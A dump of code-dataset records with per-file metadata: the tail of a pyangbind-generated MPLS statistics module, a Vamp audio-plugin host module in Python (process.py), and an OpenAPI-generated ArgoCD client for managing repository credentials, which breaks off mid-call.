# pyangbind may shadow the name 'property' in generated modules).
mpls_clear_statistics_type = __builtin__.property(_get_mpls_clear_statistics_type, _set_mpls_clear_statistics_type)
mpls_clear_statistics_transit_ldp_fec_prefix = __builtin__.property(_get_mpls_clear_statistics_transit_ldp_fec_prefix, _set_mpls_clear_statistics_transit_ldp_fec_prefix)
mpls_clear_statistics_transit_ldp_prefix_address = __builtin__.property(_get_mpls_clear_statistics_transit_ldp_prefix_address, _set_mpls_clear_statistics_transit_ldp_prefix_address)
mpls_clear_statistics_transit_ldp_prefix_mask = __builtin__.property(_get_mpls_clear_statistics_transit_ldp_prefix_mask, _set_mpls_clear_statistics_transit_ldp_prefix_mask)
mpls_clear_statistics_transit_label_id = __builtin__.property(_get_mpls_clear_statistics_transit_label_id, _set_mpls_clear_statistics_transit_label_id)
mpls_clear_statistics_tunnel_ldp_id = __builtin__.property(_get_mpls_clear_statistics_tunnel_ldp_id, _set_mpls_clear_statistics_tunnel_ldp_id)
mpls_clear_statistics_tunnel_rsvp_bypass = __builtin__.property(_get_mpls_clear_statistics_tunnel_rsvp_bypass, _set_mpls_clear_statistics_tunnel_rsvp_bypass)
mpls_clear_statistics_tunnel_name = __builtin__.property(_get_mpls_clear_statistics_tunnel_name, _set_mpls_clear_statistics_tunnel_name)
mpls_clear_statistics_tunnel_dest = __builtin__.property(_get_mpls_clear_statistics_tunnel_dest, _set_mpls_clear_statistics_tunnel_dest)
# Registry of element name -> property used by pyangbind's container machinery
# (e.g. the copy-constructor loop in __init__ iterates over this mapping).
_pyangbind_elements = {'mpls_clear_statistics_type': mpls_clear_statistics_type, 'mpls_clear_statistics_transit_ldp_fec_prefix': mpls_clear_statistics_transit_ldp_fec_prefix, 'mpls_clear_statistics_transit_ldp_prefix_address': mpls_clear_statistics_transit_ldp_prefix_address, 'mpls_clear_statistics_transit_ldp_prefix_mask': mpls_clear_statistics_transit_ldp_prefix_mask, 'mpls_clear_statistics_transit_label_id': mpls_clear_statistics_transit_label_id, 'mpls_clear_statistics_tunnel_ldp_id': mpls_clear_statistics_tunnel_ldp_id, 'mpls_clear_statistics_tunnel_rsvp_bypass': mpls_clear_statistics_tunnel_rsvp_bypass, 'mpls_clear_statistics_tunnel_name': mpls_clear_statistics_tunnel_name, 'mpls_clear_statistics_tunnel_dest': mpls_clear_statistics_tunnel_dest, }
| 85.161731
| 764
| 0.759857
| 5,610
| 37,386
| 4.740463
| 0.034581
| 0.085282
| 0.180041
| 0.109498
| 0.940663
| 0.927089
| 0.91201
| 0.886478
| 0.87234
| 0.861435
| 0
| 0.028597
| 0.100198
| 37,386
| 438
| 765
| 85.356164
| 0.76195
| 0.184989
| 0
| 0.46371
| 0
| 0.084677
| 0.405267
| 0.315923
| 0
| 0
| 0
| 0
| 0
| 1
| 0.120968
| false
| 0.052419
| 0.032258
| 0
| 0.270161
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
745ea72fdab6d4d46b5a6c0e71e3ff57d0c42227
| 11,643
|
py
|
Python
|
lib/python2.7/site-packages/vamp/process.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 16
|
2016-11-19T07:24:54.000Z
|
2021-07-09T23:30:48.000Z
|
lib/python2.7/site-packages/vamp/process.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 6
|
2017-04-05T12:00:38.000Z
|
2022-01-13T17:51:34.000Z
|
lib/python2.7/site-packages/vamp/process.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 1
|
2017-04-03T16:33:51.000Z
|
2017-04-03T16:33:51.000Z
|
#!/usr/bin/env python
# Python Vamp Host
# Copyright (c) 2008-2015 Queen Mary, University of London
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Except as contained in this notice, the names of the Centre for
# Digital Music and Queen Mary, University of London shall not be
# used in advertising or otherwise to promote the sale, use or other
# dealings in this Software without prior written authorization.
'''A high-level interface to the vampyhost extension module, for quickly and easily running Vamp audio analysis plugins on audio files and buffers.'''
import vampyhost
import vamp.frames
import vamp.load
def process_with_initialised_plugin(ff, sample_rate, step_size, plugin, outputs):
    """Run an already-configured Vamp plugin over the frames in ff, yielding
    one { output_id: feature } dict per feature returned.

    ff is an iterable of audio frames; sample_rate and step_size (in frames)
    are used to compute each block's timestamp. outputs is a list of output
    identifiers to collect; features from other outputs are discarded.
    """
    # Map each requested output identifier to its numeric index once, up front.
    # (A dict comprehension avoids shadowing the builtin `id` as the original did.)
    out_indices = {out_id: plugin.get_output(out_id)["output_index"]
                   for out_id in outputs}
    plugin.reset()
    fi = 0
    for f in ff:
        timestamp = vampyhost.frame_to_realtime(fi, sample_rate)
        # results is a dict mapping output index -> list of feature dicts
        results = plugin.process_block(f, timestamp)
        for feature in _features_for_outputs(results, out_indices, outputs):
            yield feature
        fi += step_size
    # Flush any features the plugin buffered until end-of-input.
    for feature in _features_for_outputs(plugin.get_remaining_features(),
                                         out_indices, outputs):
        yield feature

def _features_for_outputs(results, out_indices, outputs):
    """Yield { output_id: feature } for each requested output present in results."""
    for o in outputs:
        ix = out_indices[o]
        if ix in results:
            for r in results[ix]:
                yield { o: r }
def process_audio(data, sample_rate, plugin_key, output = "", parameters = None, **kwargs):
    """Process audio data with a Vamp plugin, and make the results from a
    single plugin output available as a generator.
    The provided data should be a 1- or 2-dimensional list or NumPy
    array of floats. If it is 2-dimensional, the first dimension is
    taken to be the channel count.
    The returned results will be those calculated by the plugin with
    the given key and returned through its output with the given
    output identifier. If the requested output is the empty string,
    the first output provided by the plugin will be used.
    If the parameters dict is non-empty, the plugin will be configured
    by setting its parameters according to the (string) key and
    (float) value data found in the dict.
    This function acts as a generator, yielding a sequence of result
    features as it obtains them. Each feature is represented as a
    dictionary containing, optionally, timestamp and duration
    (RealTime objects), label (string), and a 1-dimensional array of
    float values.
    If you wish to override the step size, block size, or process
    timestamp method to be used, you may supply them as keyword
    arguments with keywords step_size (int), block_size (int), and
    process_timestamp_method (choose from vamp.vampyhost.SHIFT_DATA,
    vamp.vampyhost.SHIFT_TIMESTAMP, or vamp.vampyhost.NO_SHIFT).
    If you would prefer to obtain all features in a single output
    structure, consider using vamp.collect() instead.
    """
    # Avoid a shared mutable default argument: treat None as "no parameters".
    if parameters is None:
        parameters = {}
    plugin, step_size, block_size = vamp.load.load_and_configure(data, sample_rate, plugin_key, parameters, **kwargs)
    try:
        if output == "":
            output = plugin.get_output(0)["identifier"]
        ff = vamp.frames.frames_from_array(data, step_size, block_size)
        for r in process_with_initialised_plugin(ff, sample_rate, step_size, plugin, [output]):
            yield r[output]
    finally:
        # Unload the plugin even if the consumer abandons the generator
        # before exhausting it (previously this leaked the plugin).
        plugin.unload()
def process_frames(ff, sample_rate, step_size, plugin_key, output = "", parameters = None):
    """Process audio data with a Vamp plugin, and make the results from a
    single plugin output available as a generator.
    The provided data should be an enumerable sequence of time-domain
    audio frames, of which each frame is 2-dimensional list or NumPy
    array of floats. The first dimension is taken to be the channel
    count, and the second dimension the frame or block size. The
    step_size argument gives the increment in audio samples from one
    frame to the next. Each frame must have the same size.
    The returned results will be those calculated by the plugin with
    the given key and returned through its output with the given
    output identifier. If the requested output is the empty string,
    the first output provided by the plugin will be used.
    If the parameters dict is non-empty, the plugin will be configured
    by setting its parameters according to the (string) key and
    (float) value data found in the dict.
    This function acts as a generator, yielding a sequence of result
    features as it obtains them. Each feature is represented as a
    dictionary containing, optionally, timestamp and duration
    (RealTime objects), label (string), and a 1-dimensional array of
    float values.
    If you would prefer to obtain all features in a single output
    structure, consider using vamp.collect() instead.
    """
    # Avoid a shared mutable default argument: treat None as "no parameters".
    if parameters is None:
        parameters = {}
    plugin = vampyhost.load_plugin(plugin_key, sample_rate,
                                   vampyhost.ADAPT_INPUT_DOMAIN +
                                   vampyhost.ADAPT_BUFFER_SIZE +
                                   vampyhost.ADAPT_CHANNEL_COUNT)
    try:
        fi = 0
        channels = 0
        block_size = 0
        if output == "":
            out_index = 0
        else:
            out_index = plugin.get_output(output)["output_index"]
        for f in ff:
            if fi == 0:
                # Configuration is deferred until the first frame arrives,
                # because the channel count and block size come from its shape.
                channels = f.shape[0]
                block_size = f.shape[1]
                plugin.set_parameter_values(parameters)
                if not plugin.initialise(channels, step_size, block_size):
                    # The original raised a bare string, which is itself a
                    # TypeError in Python 3; raise a real exception instead.
                    raise Exception("Failed to initialise plugin")
            timestamp = vampyhost.frame_to_realtime(fi, sample_rate)
            results = plugin.process_block(f, timestamp)
            # results is a dict mapping output number -> list of feature dicts
            if out_index in results:
                for r in results[out_index]:
                    yield r
            fi = fi + step_size
        if fi > 0:
            # Only flush remaining features if at least one block was
            # processed (otherwise the plugin was never initialised).
            results = plugin.get_remaining_features()
            if out_index in results:
                for r in results[out_index]:
                    yield r
    finally:
        # Unload the plugin even if the consumer abandons the generator
        # before exhausting it (previously this leaked the plugin).
        plugin.unload()
def process_audio_multiple_outputs(data, sample_rate, plugin_key, outputs, parameters = None, **kwargs):
    """Process audio data with a Vamp plugin, and make the results from a
    set of plugin outputs available as a generator.
    The provided data should be a 1- or 2-dimensional list or NumPy
    array of floats. If it is 2-dimensional, the first dimension is
    taken to be the channel count.
    The returned results will be those calculated by the plugin with
    the given key and returned through its outputs whose identifiers
    are given in the outputs argument.
    If the parameters dict is non-empty, the plugin will be configured
    by setting its parameters according to the (string) key and
    (float) value data found in the dict.
    This function acts as a generator, yielding a sequence of result
    feature sets as it obtains them. Each feature set is a dictionary
    mapping from output identifier to a list of features, each
    represented as a dictionary containing, optionally, timestamp and
    duration (RealTime objects), label (string), and a 1-dimensional
    array of float values.
    If you wish to override the step size, block size, or process
    timestamp method to be used, you may supply them as keyword
    arguments with keywords step_size (int), block_size (int), and
    process_timestamp_method (choose from vamp.vampyhost.SHIFT_DATA,
    vamp.vampyhost.SHIFT_TIMESTAMP, or vamp.vampyhost.NO_SHIFT).
    """
    # Avoid a shared mutable default argument: treat None as "no parameters".
    if parameters is None:
        parameters = {}
    plugin, step_size, block_size = vamp.load.load_and_configure(data, sample_rate, plugin_key, parameters, **kwargs)
    try:
        ff = vamp.frames.frames_from_array(data, step_size, block_size)
        for r in process_with_initialised_plugin(ff, sample_rate, step_size, plugin, outputs):
            yield r
    finally:
        # Unload the plugin even if the consumer abandons the generator
        # before exhausting it (previously this leaked the plugin).
        plugin.unload()
def process_frames_multiple_outputs(ff, sample_rate, step_size, plugin_key, outputs, parameters = None):
    """Process audio data with a Vamp plugin, and make the results from a
    set of plugin outputs available as a generator.
    The provided data should be an enumerable sequence of time-domain
    audio frames, of which each frame is 2-dimensional list or NumPy
    array of floats. The first dimension is taken to be the channel
    count, and the second dimension the frame or block size. The
    step_size argument gives the increment in audio samples from one
    frame to the next. Each frame must have the same size.
    The returned results will be those calculated by the plugin with
    the given key and returned through its outputs whose identifiers
    are given in the outputs argument.
    If the parameters dict is non-empty, the plugin will be configured
    by setting its parameters according to the (string) key and
    (float) value data found in the dict.
    This function acts as a generator, yielding a sequence of result
    feature sets as it obtains them. Each feature set is a dictionary
    mapping from output identifier to a list of features, each
    represented as a dictionary containing, optionally, timestamp and
    duration (RealTime objects), label (string), and a 1-dimensional
    array of float values.
    """
    # Avoid a shared mutable default argument: treat None as "no parameters".
    if parameters is None:
        parameters = {}
    plugin = vampyhost.load_plugin(plugin_key, sample_rate,
                                   vampyhost.ADAPT_INPUT_DOMAIN +
                                   vampyhost.ADAPT_BUFFER_SIZE +
                                   vampyhost.ADAPT_CHANNEL_COUNT)
    try:
        # Map each requested output identifier to its numeric output index,
        # since process_block results are keyed by output number.
        out_indices = {o: plugin.get_output(o)["output_index"] for o in outputs}
        fi = 0
        channels = 0
        block_size = 0
        for f in ff:
            if fi == 0:
                # Configuration is deferred until the first frame arrives,
                # because the channel count and block size come from its shape.
                channels = f.shape[0]
                block_size = f.shape[1]
                plugin.set_parameter_values(parameters)
                if not plugin.initialise(channels, step_size, block_size):
                    # The original raised a bare string, which is itself a
                    # TypeError in Python 3; raise a real exception instead.
                    raise Exception("Failed to initialise plugin")
            timestamp = vampyhost.frame_to_realtime(fi, sample_rate)
            results = plugin.process_block(f, timestamp)
            # results is a dict mapping output number -> list of feature dicts
            for o in outputs:
                ix = out_indices[o]
                if ix in results:
                    for r in results[ix]:
                        yield { o: r }
            fi = fi + step_size
        if fi > 0:
            # Only flush remaining features if at least one block was
            # processed (otherwise the plugin was never initialised).
            results = plugin.get_remaining_features()
            for o in outputs:
                ix = out_indices[o]
                if ix in results:
                    for r in results[ix]:
                        yield { o: r }
    finally:
        # Unload the plugin even if the consumer abandons the generator
        # before exhausting it (previously this leaked the plugin).
        plugin.unload()
| 40.70979
| 150
| 0.68436
| 1,665
| 11,643
| 4.702102
| 0.166967
| 0.020437
| 0.006131
| 0.017371
| 0.822966
| 0.799591
| 0.793205
| 0.780176
| 0.780176
| 0.780176
| 0
| 0.004288
| 0.258954
| 11,643
| 285
| 151
| 40.852632
| 0.903106
| 0.586017
| 0
| 0.841584
| 0
| 0
| 0.022691
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049505
| false
| 0
| 0.029703
| 0
| 0.079208
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
748f068a135278e831234a35a28fc4cf64b603f1
| 21,707
|
py
|
Python
|
argocd_client/api/repo_creds_service_api.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 1
|
2021-09-29T11:57:07.000Z
|
2021-09-29T11:57:07.000Z
|
argocd_client/api/repo_creds_service_api.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 1
|
2020-09-09T00:28:57.000Z
|
2020-09-09T00:28:57.000Z
|
argocd_client/api/repo_creds_service_api.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 2
|
2020-10-13T18:31:59.000Z
|
2021-02-15T12:52:33.000Z
|
# coding: utf-8
"""
Consolidate Services
Description of all APIs # noqa: E501
The version of the OpenAPI document: version not set
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from argocd_client.api_client import ApiClient
from argocd_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class RepoCredsServiceApi(object):
    """NOTE: This class is auto generated by OpenAPI Generator
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    """
    def __init__(self, api_client=None):
        # Fall back to a default ApiClient when none is supplied; all
        # requests for this service are issued through this client.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client
    def create_repository_credentials(self, body, **kwargs): # noqa: E501
        """CreateRepositoryCredentials creates a new repository credential set # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_repository_credentials(body, async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param V1alpha1RepoCreds body: Repository definition (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: V1alpha1RepoCreds
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper: delegate to the *_with_http_info variant and return
        # only the deserialized response body.
        kwargs['_return_http_data_only'] = True
        return self.create_repository_credentials_with_http_info(body, **kwargs) # noqa: E501
    def create_repository_credentials_with_http_info(self, body, **kwargs): # noqa: E501
        """CreateRepositoryCredentials creates a new repository credential set # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_repository_credentials_with_http_info(body, async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param V1alpha1RepoCreds body: Repository definition (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(V1alpha1RepoCreds, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Snapshot the named arguments plus **kwargs so they can be validated
        # uniformly below.
        local_var_params = locals()
        all_params = [
            'body'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )
        # Reject any keyword argument this endpoint does not understand.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_repository_credentials" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'body' is set
        if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
                                                       local_var_params['body'] is None): # noqa: E501
            raise ApiValueError("Missing the required parameter `body` when calling `create_repository_credentials`") # noqa: E501
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        if 'body' in local_var_params:
            body_params = local_var_params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = [] # noqa: E501
        return self.api_client.call_api(
            '/api/v1/repocreds', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='V1alpha1RepoCreds', # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
    def delete_repository_credentials(self, url, **kwargs): # noqa: E501
        """DeleteRepositoryCredentials deletes a repository credential set from the configuration # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_repository_credentials(url, async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str url: (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: object
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper: delegate to the *_with_http_info variant and return
        # only the deserialized response body.
        kwargs['_return_http_data_only'] = True
        return self.delete_repository_credentials_with_http_info(url, **kwargs) # noqa: E501
    def delete_repository_credentials_with_http_info(self, url, **kwargs): # noqa: E501
        """DeleteRepositoryCredentials deletes a repository credential set from the configuration # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_repository_credentials_with_http_info(url, async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str url: (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(object, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Snapshot the named arguments plus **kwargs so they can be validated
        # uniformly below.
        local_var_params = locals()
        all_params = [
            'url'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )
        # Reject any keyword argument this endpoint does not understand.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_repository_credentials" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'url' is set
        if self.api_client.client_side_validation and ('url' not in local_var_params or # noqa: E501
                                                       local_var_params['url'] is None): # noqa: E501
            raise ApiValueError("Missing the required parameter `url` when calling `delete_repository_credentials`") # noqa: E501
        collection_formats = {}
        path_params = {}
        # 'url' is substituted into the {url} segment of the request path.
        if 'url' in local_var_params:
            path_params['url'] = local_var_params['url'] # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = [] # noqa: E501
        return self.api_client.call_api(
            '/api/v1/repocreds/{url}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='object', # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
    def list_repository_credentials(self, **kwargs): # noqa: E501
        """ListRepositoryCredentials gets a list of all configured repository credential sets # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.list_repository_credentials(async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str url: Repo URL for query.
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: V1alpha1RepoCredsList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper: delegate to the *_with_http_info variant and return
        # only the deserialized response body.
        kwargs['_return_http_data_only'] = True
        return self.list_repository_credentials_with_http_info(**kwargs) # noqa: E501
    def list_repository_credentials_with_http_info(self, **kwargs): # noqa: E501
        """ListRepositoryCredentials gets a list of all configured repository credential sets # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.list_repository_credentials_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str url: Repo URL for query.
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(V1alpha1RepoCredsList, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Snapshot the named arguments plus **kwargs so they can be validated
        # uniformly below.
        local_var_params = locals()
        all_params = [
            'url'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )
        # Reject any keyword argument this endpoint does not understand.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_repository_credentials" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        # 'url' is an optional filter, sent as a query parameter when given.
        if 'url' in local_var_params and local_var_params['url'] is not None: # noqa: E501
            query_params.append(('url', local_var_params['url'])) # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = [] # noqa: E501
        return self.api_client.call_api(
            '/api/v1/repocreds', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='V1alpha1RepoCredsList', # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
    def update_repository_credentials(self, creds_url, body, **kwargs): # noqa: E501
        """UpdateRepositoryCredentials updates a repository credential set # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_repository_credentials(creds_url, body, async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str creds_url: URL is the URL that this credentials matches to (required)
        :param V1alpha1RepoCreds body: (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: V1alpha1RepoCreds
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper: delegate to the *_with_http_info variant and return
        # only the deserialized response body.
        kwargs['_return_http_data_only'] = True
        return self.update_repository_credentials_with_http_info(creds_url, body, **kwargs) # noqa: E501
    def update_repository_credentials_with_http_info(self, creds_url, body, **kwargs): # noqa: E501
        """UpdateRepositoryCredentials updates a repository credential set # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_repository_credentials_with_http_info(creds_url, body, async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str creds_url: URL is the URL that this credentials matches to (required)
        :param V1alpha1RepoCreds body: (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(V1alpha1RepoCreds, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Snapshot the named arguments plus **kwargs so they can be validated
        # uniformly below.
        local_var_params = locals()
        all_params = [
            'creds_url',
            'body'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )
        # Reject any keyword argument this endpoint does not understand.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_repository_credentials" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'creds_url' is set
        if self.api_client.client_side_validation and ('creds_url' not in local_var_params or # noqa: E501
                                                       local_var_params['creds_url'] is None): # noqa: E501
            raise ApiValueError("Missing the required parameter `creds_url` when calling `update_repository_credentials`") # noqa: E501
        # verify the required parameter 'body' is set
        if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
                                                       local_var_params['body'] is None): # noqa: E501
            raise ApiValueError("Missing the required parameter `body` when calling `update_repository_credentials`") # noqa: E501
        collection_formats = {}
        path_params = {}
        # Note the dotted path key: the server template is {creds.url}.
        if 'creds_url' in local_var_params:
            path_params['creds.url'] = local_var_params['creds_url'] # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        if 'body' in local_var_params:
            body_params = local_var_params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = [] # noqa: E501
        return self.api_client.call_api(
            '/api/v1/repocreds/{creds.url}', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
